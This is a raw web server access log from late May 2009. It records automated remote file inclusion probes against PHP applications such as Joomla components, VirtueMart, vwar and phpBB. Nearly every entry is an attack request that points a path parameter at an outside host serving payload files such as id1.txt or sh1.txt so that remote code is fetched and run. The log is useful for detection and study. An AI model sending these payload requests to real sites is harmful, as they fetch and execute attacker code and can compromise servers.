211.241.40.51 - - [29/May/2009:23:23:12 -0500] "GET /logs/config.php?path_to_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.241.40.51 - - [29/May/2009:23:23:12 -0500] "GET /config.php?path_to_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.241.40.51 - - [29/May/2009:23:23:12 -0500] "GET /logs/access_log.1238889600/config.php?path_to_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.10.128.219 - - [29/May/2009:23:24:01 -0500] "GET /errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.10.128.219 - - [29/May/2009:23:24:01 -0500] "GET /logs/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.10.128.219 - - [29/May/2009:23:24:01 -0500] "GET /logs/access_log.1239667200/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.241.40.51 - - [29/May/2009:23:24:39 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.241.40.51 - - [29/May/2009:23:24:39 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.241.40.51 - - [29/May/2009:23:24:39 -0500] "GET /logs/access_log.1236643200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.241.40.51 - - [29/May/2009:23:24:57 -0500] "GET /logs/access_log.1233705600/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
74.52.2.130 - - [29/May/2009:23:30:00 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
74.52.2.130 - - [29/May/2009:23:30:00 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
85.214.83.196 - - [29/May/2009:23:31:25 -0500] "GET /index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:31:25 -0500] "GET /logs/index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:31:25 -0500] "GET /logs/access_log.1235001600/index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:31:26 -0500] "GET /logs/access_log.1232150400/index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
201.232.54.48 - - [29/May/2009:23:32:37 -0500] "GET /logs/index2.php?dir=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
201.232.54.48 - - [29/May/2009:23:32:37 -0500] "GET /index2.php?dir=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
201.232.54.48 - - [29/May/2009:23:32:37 -0500] "GET /logs/access_log.1232150400/index2.php?dir=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
201.232.54.48 - - [29/May/2009:23:32:37 -0500] "GET /logs/access_log.1235001600/index2.php?dir=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.150.52.114 - - [29/May/2009:23:32:47 -0500] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
212.150.52.114 - - [29/May/2009:23:32:47 -0500] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
216.119.103.12 - - [29/May/2009:23:34:07 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_joomlaxplorer&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 404 293 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
216.119.103.12 - - [29/May/2009:23:34:08 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_joomlaxplorer&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 404 298 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
85.214.83.196 - - [29/May/2009:23:34:22 -0500] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:34:23 -0500] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:34:23 -0500] "GET /logs/access_log.1231545600//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:34:23 -0500] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:34:23 -0500] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:34:23 -0500] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:34:23 -0500] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:34:24 -0500] "GET /logs/access_log.1231545600//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:34:24 -0500] "GET /logs/access_log.1231545600//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:34:39 -0500] "GET /logs/access_log.1231718400//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:34:40 -0500] "GET /logs/access_log.1231718400//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:34:40 -0500] "GET /logs/access_log.1231718400//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.119.103.12 - - [29/May/2009:23:35:59 -0500] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
216.119.103.12 - - [29/May/2009:23:36:00 -0500] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
77.79.12.5 - - [29/May/2009:23:37:13 -0500] "GET /logs/index.php?meio=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
77.79.12.5 - - [29/May/2009:23:37:13 -0500] "GET /index.php?meio=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
189.14.202.124 - - [29/May/2009:23:37:21 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
189.14.202.124 - - [29/May/2009:23:37:21 -0500] "GET //?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
189.14.202.124 - - [29/May/2009:23:38:00 -0500] "GET /logs//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:39:13 -0500] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:39:13 -0500] "GET /logs/access_log.1231545600//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:39:13 -0500] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:39:18 -0500] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:39:18 -0500] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:39:18 -0500] "GET /logs/access_log.1231545600//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:39:21 -0500] "GET /logs/access_log.1231718400//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:39:21 -0500] "GET //error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:39:21 -0500] "GET /logs//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:39:21 -0500] "GET /logs/access_log.1231545600//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:39:28 -0500] "GET /logs/access_log.1231718400//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:39:28 -0500] "GET /logs/access_log.1231718400//error.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.150.52.114 - - [29/May/2009:23:40:18 -0500] "GET /logs/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
212.150.52.114 - - [29/May/2009:23:40:18 -0500] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
85.214.83.196 - - [29/May/2009:23:41:49 -0500] "GET /index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:41:49 -0500] "GET /logs/index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:41:49 -0500] "GET /logs/access_log.1235001600/index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.83.196 - - [29/May/2009:23:41:50 -0500] "GET /logs/access_log.1232150400/index2.php?dir=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.119.103.12 - - [29/May/2009:23:45:31 -0500] "GET /logs/access_log.1242086400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
216.119.103.12 - - [29/May/2009:23:45:31 -0500] "GET /logs/access_log.1241654400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
216.119.103.12 - - [29/May/2009:23:45:31 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.119.103.12 - - [29/May/2009:23:45:31 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
201.232.54.48 - - [29/May/2009:23:46:20 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
201.232.54.48 - - [29/May/2009:23:46:20 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
201.232.54.48 - - [29/May/2009:23:46:21 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
216.119.103.12 - - [29/May/2009:23:46:38 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.119.103.12 - - [29/May/2009:23:46:38 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
216.119.103.12 - - [29/May/2009:23:46:38 -0500] "GET /logs/access_log.1242086400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
216.119.103.12 - - [29/May/2009:23:46:43 -0500] "GET /logs/access_log.1241654400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
201.232.54.48 - - [29/May/2009:23:47:57 -0500] "GET /logs/access_log.1234483200/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
85.17.162.28 - - [29/May/2009:23:49:18 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://chicken.ucoz.org/botscan/id.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
85.17.162.28 - - [29/May/2009:23:49:18 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://chicken.ucoz.org/botscan/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
121.130.29.11 - - [29/May/2009:23:52:32 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.130.29.11 - - [29/May/2009:23:52:32 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.130.29.11 - - [29/May/2009:23:52:32 -0500] "GET /logs/access_log.1229990400//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.6.231.215 - - [29/May/2009:23:53:32 -0500] "GET //poll/poll_ssi.php?include_path=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 404 301 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.212.165.114 - - [29/May/2009:23:53:33 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:23:53:33 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:23:53:33 -0500] "GET /logs/access_log.1235779200//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
67.212.165.114 - - [29/May/2009:23:53:33 -0500] "GET /logs/access_log.1235347200//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
75.125.245.26 - - [29/May/2009:23:54:53 -0500] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 329 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
77.79.246.241 - - [29/May/2009:23:55:47 -0500] "GET /logs/access_log.1242086400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
77.79.246.241 - - [29/May/2009:23:55:47 -0500] "GET /logs/access_log.1241654400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
77.79.246.241 - - [29/May/2009:23:55:47 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
77.79.246.241 - - [29/May/2009:23:55:47 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.79.246.241 - - [29/May/2009:23:56:18 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.79.246.241 - - [29/May/2009:23:56:18 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
77.79.246.241 - - [29/May/2009:23:56:18 -0500] "GET /logs/access_log.1242086400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
77.79.246.241 - - [29/May/2009:23:56:19 -0500] "GET /logs/access_log.1241654400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.106.171 - - [29/May/2009:23:57:38 -0500] "GET /logs/access_log.1140393600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.149.157.130 - - [29/May/2009:23:59:29 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.130 - - [29/May/2009:23:59:29 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.130 - - [29/May/2009:23:59:29 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.130 - - [29/May/2009:23:59:29 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
69.50.197.106 - - [30/May/2009:00:01:01 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:01:01 -0500] "GET //?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:01:06 -0500] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:01:07 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
91.149.157.130 - - [30/May/2009:00:02:14 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
91.149.157.130 - - [30/May/2009:00:02:14 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
91.149.157.130 - - [30/May/2009:00:02:14 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
91.149.157.130 - - [30/May/2009:00:02:14 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
85.17.162.28 - - [30/May/2009:00:02:22 -0500] "GET /logs/access_log.1232755200/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:02:22 -0500] "GET /convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:02:22 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:02:35 -0500] "GET /logs/access_log.1231718400/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:04:20 -0500] "GET //?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:04:20 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:04:21 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:04:25 -0500] "GET /logs/access_log.1242086400//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:05:08 -0500] "GET /convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:05:11 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:05:11 -0500] "GET /logs/access_log.1232755200/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:05:15 -0500] "GET /logs/access_log.1231718400/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
189.14.202.124 - - [30/May/2009:00:05:47 -0500] "GET //?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
189.14.202.124 - - [30/May/2009:00:05:47 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:05:59 -0500] "GET /convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:05:59 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:06:01 -0500] "GET /logs/access_log.1232755200/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
189.14.202.124 - - [30/May/2009:00:06:04 -0500] "GET /logs//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:06:10 -0500] "GET /logs/access_log.1231718400/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
91.149.157.130 - - [30/May/2009:00:12:11 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.130 - - [30/May/2009:00:12:11 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.130 - - [30/May/2009:00:12:11 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
